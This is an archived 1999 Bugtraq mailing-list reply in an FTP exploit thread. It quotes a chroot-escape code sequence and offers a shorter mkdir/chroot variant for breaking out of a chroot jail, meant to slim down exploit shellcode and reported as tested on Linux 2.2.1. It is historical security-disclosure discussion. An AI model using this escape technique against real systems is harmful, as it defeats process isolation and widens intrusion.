[9989] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: another ftp exploit (fwd)

daemon@ATHENA.MIT.EDU (Artem Malyshev)
Fri Mar 26 14:36:23 1999

Date: 	Fri, 26 Mar 1999 14:08:25 +0200
Reply-To: Artem Malyshev <artem@AM.ALEXRADIO.COM>
From: Artem Malyshev <artem@AM.ALEXRADIO.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.LNX.4.04.9903261241400.1095-100000@home.linux>

> /* To break chroot we have to...
>
>    fd = open ( ".", O_RDONLY );
>    mkdir ( "hax0r", 0666 );
>    chroot ( "hax0r" );
>    fchdir ( fd );
>    for ( i = 0; i < 254; i++ )
>        chdir ( ".." );
>    chroot ( "." );
>
> */

Too complex for standart linux
All we have to do to break chroot is:

 mkdir("/sh");   // we already have string "/sh" in memory as a part of
		 // "/bin/sh"
 chroot("/sh");
 chroot("../../../../../../../../../"); // a number of "../" here,
					// I used 0x10

Last string can be built is stack with a simple loop
Tested on linux 2.2.1

 -am


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[9989] in bugtraq

Re: another ftp exploit (fwd)

daemon@ATHENA.MIT.EDU (Artem Malyshev)Fri Mar 26 14:36:23 1999

daemon@ATHENA.MIT.EDU (Artem Malyshev)
Fri Mar 26 14:36:23 1999